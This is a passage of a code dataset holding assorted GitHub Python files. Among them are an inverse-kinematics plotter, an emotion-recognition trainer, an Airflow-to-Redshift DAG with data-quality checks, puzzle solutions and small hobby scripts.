abs(degrees(theta2)) <= 135 else \"red\"\n )\n\n ax.text(\n x1 + plot_limit/10*cos(theta1 + theta2/2),\n y1 + plot_limit/10*sin(theta1 + theta2/2),\n \"%0.2f\" % degrees(theta2)+u\"\\u00b0\",\n fontsize=8,\n 
color=\"cyan\" if abs(degrees(theta2)) <= 135 else \"red\"\n )\n\n ax.add_patch(arc2)\n\n ax.text(\n x2 + plot_limit/25,\n y2 + plot_limit/25,\n \"(\" + \"%0.2f\" % px + \",\" + \"%0.2f\" % py + \")\",\n fontsize=8,\n color=\"magenta\"\n )\n\n ax.plot(px, py, 'o', color='m')\n ax.grid()\n\n plt.show()\n\n\ndef pruebasAleatorias(n):\n for i in range(n):\n l1 = random.random()\n l2 = random.random()\n px = 2*random.random()-1\n py = 2*random.random()-1\n\n print()\n print(f'Prueba {i}:')\n print(f'l1 = {l1}')\n print(f'l2 = {l2}')\n print(f'px = {px}')\n print(f'py = {py}')\n\n try:\n plotInverseK(l1, l2, px, py)\n except:\n print(\n f\"No es posible alcanzar el punto ({px},{py}), con los brazos de longitud l1={l1} y l2={l2}\")\n\n\ndef pruebasObtenerCoordenadas():\n while True:\n print()\n l1 = float(input('Ingrese la longitud del brazo 1: '))\n l2 = float(input('Ingrese la longitud del brazo 2: '))\n px = float(input('Ingrese la coordenada x del punto p: '))\n py = float(input('Ingrese la coordenada y del punto p: '))\n\n try:\n plotInverseK(l1, l2, px, py)\n except:\n print(\n f\"No es posible alcanzar el punto ({px},{py}), con los brazos de longitud l1={l1} y l2={l2}\")\n\n\nif __name__ == '__main__':\n pruebasAleatorias(20)\n # pruebasObtenerCoordenadas()\n","repo_name":"fpalaciosFM/Inverse_Kinematics-2gdl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28295831398","text":"import cv2, glob, random, math, numpy as np, dlib, itertools\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn import linear_model\n\nemotions = [\"Disgust\",\"Angry\",\"Fear\",\"Surprise\"]#, \"Happy\", \"Neutral\", \"Sad\"] #Emotion list\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\") \n\n#clf = SVC(kernel='linear', probability=True, tol=1e-3)\n\nclf = RandomForestClassifier(min_samples_leaf=20)\n\n#clf = linear_model.LogisticRegression(C=1e5)\n\n\n#n_estimators = 10\n#clf = OneVsRestClassifier(BaggingClassifier(SVC(kernel='linear', probability=True, class_weight='balanced'), max_samples=1.0 / n_estimators, n_estimators=n_estimators),n_jobs=-1)\n\n\ndef get_files(emotion):\n print(\"./images/%s/*\" %emotion)\n files = glob.glob(\"./images/%s/*\" %emotion)\n print(len(files))\n \n random.shuffle(files)\n training = files[:int(len(files)*0.8)] #get first 80% of file list\n prediction = files[-int(len(files)*0.2):] #get last 20% of file list\n \n return training, prediction\n\ndef get_landmarks(image):\n detections = detector(image, 1)\n for k,d in enumerate(detections): #For all detected face instances individually\n shape = predictor(image, d) #Draw Facial Landmarks with the predictor class\n xlist = []\n ylist = []\n for i in range(1,68): #Store X and Y coordinates in two lists\n xlist.append(float(shape.part(i).x))\n ylist.append(float(shape.part(i).y))\n \n xmean = np.mean(xlist) #Get the mean of both axes to determine centre of gravity\n ymean = np.mean(ylist)\n xcentral = [(x-xmean) for x in xlist] #get distance between each point and the central point in both axes\n ycentral = [(y-ymean) for y in ylist]\n\n if xlist[26] == xlist[29]: #If x-coordinates of the set are the same, the angle is 0, catch to prevent 'divide by 
0' error in function\n anglenose = 0\n else:\n anglenose = int(math.atan((ylist[26]-ylist[29])/(xlist[26]-xlist[29]))*180/math.pi)\n\n if anglenose < 0:\n anglenose += 90\n else:\n anglenose -= 90\n\n landmarks_vectorised = []\n for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):\n landmarks_vectorised.append(x)\n landmarks_vectorised.append(y)\n meannp = np.asarray((ymean,xmean))\n coornp = np.asarray((z,w))\n dist = np.linalg.norm(coornp-meannp)\n anglerelative = (math.atan((z-ymean)/(w-xmean))*180/math.pi) - anglenose\n landmarks_vectorised.append(dist)\n landmarks_vectorised.append(anglerelative)\n\n if len(detections) < 1: \n landmarks_vectorised = \"error\"\n return landmarks_vectorised\n\ndef make_sets():\n training_data = []\n training_labels = []\n prediction_data = []\n prediction_labels = []\n for emotion in emotions:\n training, prediction = get_files(emotion)\n for item in training:\n image = cv2.imread(item) #open image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) #convert to grayscale\n clahe_image = clahe.apply(gray)\n landmarks_vectorised = get_landmarks(clahe_image)\n if landmarks_vectorised == \"error\":\n pass\n else:\n training_data.append(landmarks_vectorised) #append image array to training data list\n training_labels.append(emotions.index(emotion))\n \n for item in prediction:\n image = cv2.imread(item)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n clahe_image = clahe.apply(gray)\n landmarks_vectorised = get_landmarks(clahe_image)\n if landmarks_vectorised == \"error\":\n pass\n else:\n prediction_data.append(landmarks_vectorised)\n prediction_labels.append(emotions.index(emotion))\n\n return training_data, training_labels, prediction_data, prediction_labels \n\naccur_lin = [] # 10 random set generation\nfor i in range(0,10):\n print(\"Making sets %s\" %i) #Make sets by random sampling 80/20%\n training_data, training_labels, prediction_data, prediction_labels = make_sets()\n\n npar_train = np.array(training_data) # numpy array\n npar_trainlabs = np.array(training_labels)\n \n print(\"training model %s\" %i) #train model\n clf.fit(npar_train, training_labels)\n\n print(\"getting accuracies %s\" %i)\n npar_pred = np.array(prediction_data)\n pred_lin = clf.score(npar_pred, prediction_labels)\n print (\"Model: \", pred_lin)\n accur_lin.append(pred_lin) #Store accuracy in a list\n\nprint(\"Mean value accuracy in Model: %.3f\" %np.mean(accur_lin)) \n","repo_name":"vishalsingh020997/Emotion-Recognition-using-Facial-Landmarks","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"13638317229","text":"\"\"\"listing_tag_assoc many to many table created\n\nRevision ID: c6d6defde195\nRevises: dfcf20622785\nCreate Date: 2019-11-25 20:07:46.661788\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c6d6defde195'\ndown_revision = 'dfcf20622785'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('listing_tag_assoc',\n sa.Column('listing_id', sa.Integer(), nullable=True),\n sa.Column('tag_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['listing_id'], ['listing.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['listing_tag.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('listing_tag_assoc')\n # ### end Alembic commands ###\n","repo_name":"SammyPulos/CollaborationNow","sub_path":"migrations/versions/c6d6defde195_listing_tag_assoc_many_to_many_table_.py","file_name":"c6d6defde195_listing_tag_assoc_many_to_many_table_.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"31741393296","text":"from sensobox.button import a_instance as left_btn, b_instance as right_btn\nfrom sensobox.display import instance as display\nfrom time import sleep_ms\n\nimport random\n\nvalues = []\ndisplay_left = \"****\"\ndisplay_right = \"vvvv\"\nleft = True\nright = False\n\nfor i in range(4):\n values.append(random.getrandbits(1))\n \nfor b in values:\n display.show(display_left if b else display_right)\n sleep_ms(400)\n display.show(\" \")\n sleep_ms(400)\n\n@left_btn.on_press\ndef a():\n check(left)\n \n@right_btn.on_press\ndef b():\n check(right)\n \ndef check(side):\n display.show(display_left if side else display_right)\n sleep_ms(100)\n display.show(\" \")\n v = values.pop(0)\n if v != side:\n wrong()\n elif len(values) == 0:\n win()\n \ndef win():\n for _ in range(3):\n display.show(\"nice\")\n sleep_ms(300)\n display.show(\" \")\n sleep_ms(300)\n \ndef wrong():\n for _ in range(3):\n display.show(\"----\")\n sleep_ms(300)\n display.show(\" \")\n sleep_ms(300)\n","repo_name":"octopusengine/octopuslab","sub_path":"projects/sensobox/projects/p09_memory_game/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"47"}
{"seq_id":"74567462862","text":"import collections\nimport heapq\nfrom typing import List\n\n\nclass Graph:\n def __init__(self):\n self._graph = collections.defaultdict(list)\n\n def add_edge(self, from_, to, price):\n self._graph[from_].append((to, price))\n\n def dijkstra(self, src, dst, K):\n costs = collections.defaultdict(lambda: float('inf'))\n current_stops = collections.defaultdict(lambda: float('inf'))\n costs[src], current_stops[src] = 0, 0\n\n # heap entries are (price so far, node, stops) so the cheapest route pops first\n heap = []\n heapq.heappush(heap, (0, src, 0))\n\n while len(heap) != 0:\n price_so_far, current, stops = heapq.heappop(heap)\n if stops == K + 1:\n continue\n\n for to, price in self._graph[current]:\n if price+price_so_far < costs[to]:\n costs[to] = price+price_so_far\n heapq.heappush(heap, (price+price_so_far, to, stops+1))\n elif stops < current_stops[to]:\n current_stops[to] = stops\n heapq.heappush(heap, (price+price_so_far, to, stops+1))\n\n return -1 if costs[dst] == float(\"inf\") else costs[dst]\n\n\n# def bfs(self, src, dst, K):\n# # runs infinitely if graph is cyclic\n# min_price = float('inf')\n# queue = collections.deque()\n# queue.appendleft((src, 0, 0))\n#\n# while len(queue) != 0:\n# current, price_so_far, stops = queue.pop()\n# if stops == K + 2:\n# continue\n#\n# if current == dst:\n# min_price = min(min_price, price_so_far)\n#\n# for to, price in self._graph[current]:\n# queue.appendleft((to, price + price_so_far, stops+1))\n#\n# return min_price if min_price != float('inf') else -1\n\n\nclass Solution:\n def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:\n graph = Graph()\n for from_, to, price in flights:\n graph.add_edge(from_, to, price)\n\n return graph.dijkstra(src, dst, 
K)\n","repo_name":"azimjohn/leetcode","sub_path":"june_challenge/14_cheapest_flight_within_k_stops.py","file_name":"14_cheapest_flight_within_k_stops.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"39012987848","text":"\"\"\"\nHomework task for Vinted Data Engineering Academy\nExample use of the implemented MapReduce framework\nAuthor: Titas Janusonis\n\"\"\"\nimport pandas as pd\n\nfrom MapReduce import MapReduce\n\n# task #1\n\nMapReduce(\n maper={\n \"data/clicks\": lambda click: (click[\"date\"], click[\"date\"])\n },\n reducer=lambda kv: [{\"date\": kv[0], \"count\": kv[1].count(kv[0])}]\n ,\n output=\"data/clicks_per_day\"\n)\n\n# task #2\n\ndef user_map(user: pd.Series) -> tuple[int, pd.Series]:\n if user[\"country\"] == \"LT\":\n return (user[\"id\"], user.copy())\n\ndef country_reducer(kv: tuple[int, list]) -> list[dict]:\n index_list = kv[1][0].index.tolist()\n data_entries = kv[1]\n # only need entries with clicks and country info\n if index_list.count('country') > 0 and len(data_entries) > 1:\n df = pd.concat(data_entries[1:])\n df = df.groupby(level=0).agg(list).apply(pd.Series).T\n df[index_list] = data_entries[0]\n\n return df.to_dict(orient=\"records\")\n\n\nMapReduce(\n maper={\n \"data/users\": user_map,\n \"data/clicks\": lambda click: (click[\"user_id\"], click.copy())\n },\n reducer=country_reducer, \n output=\"data/filtered_clicks\"\n)\n","repo_name":"SyroQT/vinted-hm","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74053102223","text":"from django.db import models\nfrom django.db.models.signals import pre_save\nimport uuid\n# Create your models here.\nclass Client(models.Model):\n name=models.CharField(max_length=120,null=False,blank=False)\n token=models.UUIDField(default=uuid.uuid4,editable=False,null=False,blank=False)\n \n def __str__(self):\n return self.name\n \n class ReadonlyMeta:\n readonly = [\"token\"]","repo_name":"asutosh05/xrp-multisig-wallet","sub_path":"clients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"32189318501","text":"# AOC 2021 Day 6\n# Chris O\n#\n# Goal determine amount of fish left after 80 days\n# fish timer reach 0 and change to 6 reproduce\n# new fish doesn't count down day born but starts next journey at 8 instead\n\n# example\n\n# Initial state: 3,4,3,1,2\n# After 1 day: 2,3,2,0,1\n# After 2 days: 1,2,1,6,0,8\n# After 3 days: 0,1,0,5,6,7,8\n# After 4 days: 6,0,6,4,5,6,7,8,8\n# After 5 days: 5,6,5,3,4,5,6,7,7,8\n# After 6 days: 4,5,4,2,3,4,5,6,6,7\n# After 7 days: 3,4,3,1,2,3,4,5,5,6\n# After 8 days: 2,3,2,0,1,2,3,4,4,5\n# After 9 days: 1,2,1,6,0,1,2,3,3,4,8\n# After 10 days: 0,1,0,5,6,0,1,2,2,3,7,8\n# After 11 days: 6,0,6,4,5,6,0,1,1,2,6,7,8,8,8\n# After 12 days: 5,6,5,3,4,5,6,0,0,1,5,6,7,7,7,8,8\n# After 13 days: 4,5,4,2,3,4,5,6,6,0,4,5,6,6,6,7,7,8,8\n# After 14 days: 3,4,3,1,2,3,4,5,5,6,3,4,5,5,5,6,6,7,7,8\n# After 15 days: 2,3,2,0,1,2,3,4,4,5,2,3,4,4,4,5,5,6,6,7\n# After 16 days: 1,2,1,6,0,1,2,3,3,4,1,2,3,3,3,4,4,5,5,6,8\n# After 17 days: 0,1,0,5,6,0,1,2,2,3,0,1,2,2,2,3,3,4,4,5,7,8\n# After 18 days: 6,0,6,4,5,6,0,1,1,2,6,0,1,1,1,2,2,3,3,4,6,7,8,8,8,8\n\nimport matplotlib.pyplot as plt\nimport re\nimport numpy as np\nimport 
math\n#filename = 'day6_inputsample.txt'\nfilename = 'day6_input.txt'\ndatin = open(filename)\ndatinss = datin.read()\ndatin.close()\n\nblahdata = datinss.split(',')\ndata = [None]*len(blahdata)\ndata2 = [None]*len(blahdata)\nfor x in range(len(blahdata)):\n data[x] = int(blahdata[x])\n data2[x] = int(blahdata[x])\n\ndef fishloop(flist):\n tmp = []\n for e in flist:\n if e == 0:\n tmp.append(6)\n tmp.append(8)\n else:\n tmp.append(e-1)\n return tmp\n \n# run loop to iterate 80 days\nfor i in range(80):\n data = fishloop(data)\n \nnumfish = len(data)\nprint('Part 1, after 80 days there are ',numfish,' fish')\n\n#Part 2\n# New approach: I should keep the count of fish per timer value (0,1,2,3,4,5,6,7,8)\n# and have the list slowly shift to the left, with the leftmost group spawning new fish\n# at day 8 and also being added back at day 6\n# be careful not to move day-8 fish on the first day\n\ndays = 256\n\n# number of fish per timer value\nfishgroup = [0]*9\n\nfor j in data2:\n fishgroup[j] +=1\n \nfor k in range(days):\n temp = fishgroup.pop(0)\n fishgroup[6] += temp\n fishgroup.append(temp)\n \nprint(\"Part 2, after 256 days there are \",sum(fishgroup),\" fish\")\n","repo_name":"doparko/advent_of_code","sub_path":"aoc2021/day6_code.py","file_name":"day6_code.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"9769325200","text":"a = input()\r\nb = input()\r\nc = input()\r\nd = input()\r\ne = input()\r\nf = input()\r\ng = input()\r\nh = input()\r\ni = input()\r\nj = input()\r\n\r\nprint(int(a) + int(b) + int(c) + int(d) + int(e) + int(f) + int(g) + int(h) + int(i) + int(j))\r\n","repo_name":"Nico0106/CA116","sub_path":"labsheet-1b/add-ten-numbers.py","file_name":"add-ten-numbers.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"12928542044","text":"from load_image import ft_load\nimport cv2 as cv\nimport numpy as np\n\n\ndef ft_invert(array: np.ndarray) -> np.ndarray:\n '''Inverts the color of the image received.'''\n try:\n assert isinstance(array, np.ndarray)\n invert = array.copy()\n lrow, lcol, _ = invert.shape\n for x in range(lrow):\n for y in range(lcol):\n invert[x][y][0] = 255 - invert[x][y][0]\n invert[x][y][1] = 255 - invert[x][y][1]\n invert[x][y][2] = 255 - invert[x][y][2]\n cv.imshow(\"invertLandscape.jpg\", invert)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\ndef ft_red(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to red.'''\n try:\n assert isinstance(array, np.ndarray)\n red = array.copy()\n lrow, lcol, _ = red.shape\n for x in range(lrow):\n for y in range(lcol):\n red[x][y][0] = 0\n red[x][y][1] = 0\n cv.imshow(\"redLandscape.jpg\", red)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\ndef ft_green(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to green.'''\n try:\n assert isinstance(array, np.ndarray)\n green = array.copy()\n lrow, lcol, _ = green.shape\n for x in range(lrow):\n for y in range(lcol):\n green[x][y][0] = 0\n green[x][y][2] = 0\n cv.imshow(\"greenLandscape.jpg\", green)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\ndef ft_blue(array: 
np.ndarray) -> np.ndarray:\n '''Changes the image received to blue.'''\n try:\n assert isinstance(array, np.ndarray)\n blue = array.copy()\n lrow, lcol, _ = blue.shape\n for x in range(lrow):\n for y in range(lcol):\n blue[x][y][1] = 0\n blue[x][y][2] = 0\n cv.imshow(\"blueLandscape.jpg\", blue)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\ndef ft_grey(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to grey.'''\n try:\n assert isinstance(array, np.ndarray)\n grey = array.copy()\n lrow, lcol, _ = grey.shape\n for x in range(lrow):\n for y in range(lcol):\n grey[x][y][0] = grey[x][y][1]\n grey[x][y][2] = grey[x][y][1]\n cv.imshow(\"greyLandscape.jpg\", grey)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\ndef main():\n '''Run a few manual tests.'''\n try:\n array = ft_load(\"../images/landscape.jpg\")\n assert isinstance(array, np.ndarray)\n cv.imshow(\"landscape.jpg\", array)\n cv.waitKey(0)\n ft_invert(array)\n ft_red(array)\n ft_green(array)\n ft_blue(array)\n ft_grey(array)\n print(ft_invert.__doc__)\n print(ft_red.__doc__)\n print(ft_green.__doc__)\n print(ft_blue.__doc__)\n print(ft_grey.__doc__)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(doesn't exist, or is not a jpg or jpeg)\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gmorange42/Python-for-Data-Science","sub_path":"Array/ex05/pimp_image.py","file_name":"pimp_image.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"27677300864","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\n\ns3_key_song_data = 'song_data'\ns3_key_log_data = 'log_data/{execution_date.year}/{execution_date.month}'\nretry_delay = timedelta(minutes=5)\n\ndefault_args = {\n 'owner': 'udacity',\n 'depends_on_past': False,\n 'start_date': datetime(2018, 11, 30, 23, 0, 0),\n 'end_date': datetime(2018, 11, 30, 23, 0, 0),\n 'retries': 3,\n 'retry_delay': retry_delay,\n 'email_on_retry': False,\n 'catchup': False\n}\n\ndag = DAG('songplaysdwh_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval=timedelta(hours=1)\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id='aws_credentials',\n table='staging_events',\n s3_bucket='udacity-dend',\n s3_key=s3_key_log_data,\n region='us-west-2',\n data_format = 'json',\n data_format_args = \"'s3://udacity-dend/log_json_path.json'\",\n data_format_kwargs = None,\n file_compression = '',\n data_conversion_args = None,\n data_conversion_kwargs = None,\n data_load_args = None,\n data_load_kwargs = {'STATUPDATE':'OFF'},\n del_existing = True\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id='aws_credentials',\n table='staging_songs',\n s3_bucket='udacity-dend',\n s3_key=s3_key_song_data,\n region='us-west-2',\n data_format = 'json',\n data_format_args 
= \"'auto'\",\n data_format_kwargs = None,\n file_compression = '',\n data_conversion_args = None,\n data_conversion_kwargs = None,\n data_load_args = None,\n data_load_kwargs = {'STATUPDATE':'OFF'},\n del_existing = True\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='songplays',\n select_sql=SqlQueries.songplay_table_insert\n)\n\nload_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='users',\n select_sql=SqlQueries.user_table_insert,\n append=False\n)\n\nload_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='songs',\n select_sql=SqlQueries.song_table_insert,\n append=False\n)\n\nload_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='artists',\n select_sql=SqlQueries.artist_table_insert,\n append=False\n)\n\nload_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='time',\n select_sql=SqlQueries.time_table_insert,\n append=False\n)\n\n# Assertion function returns True when conditions met\ndef count_gt_zero(records):\n if len(records) < 1 or len(records[0]) < 1:\n return False\n num_records = records[0][0]\n if num_records < 1:\n return False\n return True\n\n# Assertion function returns True when conditions met\ndef count_eq_zero(records):\n if len(records) > 0 and len(records[0]) > 0:\n num_records = records[0][0]\n if num_records > 0:\n return False\n return True\n\n# Return test dict to enable testing for existence of data by DataQualityOperator\ndef get_data_exists_test(table=''):\n return {'sql': \"SELECT COUNT(*) FROM {}\".format(table),\n 'assertion': count_gt_zero,\n 'error_message': \"Data quality check failed. {} contained 0 rows\".format(table),\n 'log_message':('Data quality check for data on table {} passed with > 0 records'\n .format(table))}\n\n# Return test dict to enable testing of primary key for uniqueness by DataQualityOperator\ndef get_primary_key_test(table='', primary_key=''):\n return {'sql': \"\"\"SELECT COUNT(*) FROM\n (SELECT COUNT({}) AS pkey_count\n FROM {}\n GROUP BY {}\n HAVING pkey_count > 1) dup_pkeys\n \"\"\".format(primary_key, table, primary_key),\n 'assertion': count_eq_zero,\n 'error_message': (\"Data quality check failed. {} has duplicates in {} column\"\n .format(table, primary_key)),\n 'log_message':(\"Data quality check for primary_key {} \".format(primary_key) +\n \"on table {} passed with no duplicates\".format(table))}\n\n# Return test dict to enable checking that there are no nulls for a column by DataQualityOperator\ndef get_not_nulls_test(table='', field=''):\n return {'sql': \"SELECT count(*) FROM {} WHERE {} is NULL\".format(table, field),\n 'assertion': count_eq_zero,\n 'error_message': (\"Data quality check failed. {} contains null(s) in col {}\"\n .format(table, field)),\n 'log_message':(\"Data quality check passed. 
Zero nulls in col {} on table {}\"\n .format(field, table))}\n\n# songplays tests\ndata_exists_test = get_data_exists_test(table='songplays')\nprimary_key_test = get_primary_key_test(table='songplays', primary_key='playid')\nnot_null_start_time_test = get_not_nulls_test(table='songplays', field='start_time')\nnot_null_userid_test = get_not_nulls_test(table='songplays', field='userid')\nall_tests = [data_exists_test,\n primary_key_test,\n not_null_start_time_test,\n not_null_userid_test]\n\nrun_songplay_quality_checks = DataQualityOperator(\n task_id='Run_songplay_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# user tests\ndata_exists_test = get_data_exists_test(table='users')\nprimary_key_test = get_primary_key_test(table='users', primary_key='userid')\nall_tests = [data_exists_test,\n primary_key_test]\n\nrun_user_quality_checks = DataQualityOperator(\n task_id='Run_user_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# song tests\ndata_exists_test = get_data_exists_test(table='songs')\nprimary_key_test = get_primary_key_test(table='songs', primary_key='songid')\nnot_null_test = get_not_nulls_test(table='songs', field='title')\nall_tests = [data_exists_test,\n primary_key_test,\n not_null_test]\n\nrun_song_quality_checks = DataQualityOperator(\n task_id='Run_song_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# artist tests\ndata_exists_test = get_data_exists_test(table='artists')\nnot_null_test = get_not_nulls_test(table='artists', field='artistid')\nall_tests = [data_exists_test,\n not_null_test]\n\nrun_artist_quality_checks = DataQualityOperator(\n task_id='Run_artist_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# time tests\ndata_exists_test = get_data_exists_test(table='time')\nprimary_key_test = get_primary_key_test(table='time', primary_key='start_time')\nall_tests = [data_exists_test,\n primary_key_test]\n\nrun_time_quality_checks = DataQualityOperator(\n task_id='Run_time_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\nstart_operator >> stage_events_to_redshift\nstart_operator >> stage_songs_to_redshift\nstage_events_to_redshift >> load_songplays_table\nstage_songs_to_redshift >> load_songplays_table\nload_songplays_table >> run_songplay_quality_checks\nrun_songplay_quality_checks >> load_user_dimension_table\nrun_songplay_quality_checks >> load_song_dimension_table\nrun_songplay_quality_checks >> load_artist_dimension_table\nrun_songplay_quality_checks >> load_time_dimension_table\nload_user_dimension_table >> run_user_quality_checks\nload_song_dimension_table >> run_song_quality_checks\nload_artist_dimension_table >> run_artist_quality_checks\nload_time_dimension_table >> run_time_quality_checks\nrun_user_quality_checks >> end_operator\nrun_song_quality_checks >> end_operator\nrun_artist_quality_checks >> end_operator\nrun_time_quality_checks >> end_operator\n","repo_name":"dysartcoal/ProjectDataPipeline","sub_path":"dags/songplaysdwh_dag.py","file_name":"songplaysdwh_dag.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"22132527687","text":"\"\"\"\nInput example 1\n2 20 50\n50 30\n20 40\n\nOutput example 1\n\nInput example 2\n2 40 50\n50 30\n20 40\n\nOutput example 2\n0\n\nInput example 3\n2 20 50\n50 30\n30 40\n\nOutput example 3\n1\n\nInput example 4\n3 5 10\n10 15 20\n20 30 25\n40 22 10\n\nOutput example 4\n2\n\nInput example 5\n4 10 50\n10 100 20 90\n80 100 60 70\n70 20 30 40\n50 20 100 10\n\n\nOutput example 5\n3\n\n\"\"\"\n\n\nn, l, r = map(int, input().split())\n\ngraph = []\n\n\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n\ntemp = [[-1]*n for _ in range(n)]\ntemp[0][0] = 0\n\nprint(n, l, r)\nprint(graph)\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ndef check(x, y):\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if nx >= 0 and nx < n and ny >= 0 and ny < n:\n # need to check here whether the border between the two cells opens\n value = abs(graph[x][y] - graph[nx][ny])\n if l <= value and value < r:\n\n # if it is -1, give it mine; if it is not -1, take the neighbor's\n if temp[nx][ny] == -1:\n temp[nx][ny] = temp[x][y]\n else:\n temp[x][y] = temp[nx][ny]\n else:\n temp[nx][ny] = temp[x][y] + 1\n\n\n\n\nfor i in range(n):\n for j in range(n):\n check(i, j)\n\nprint(temp)","repo_name":"hanjungwoo1/CodingTest","sub_path":"이것이 취업을 위한 코딩 테스트다/Chapter 13/인구 이동_2.py","file_name":"인구 이동_2.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"}
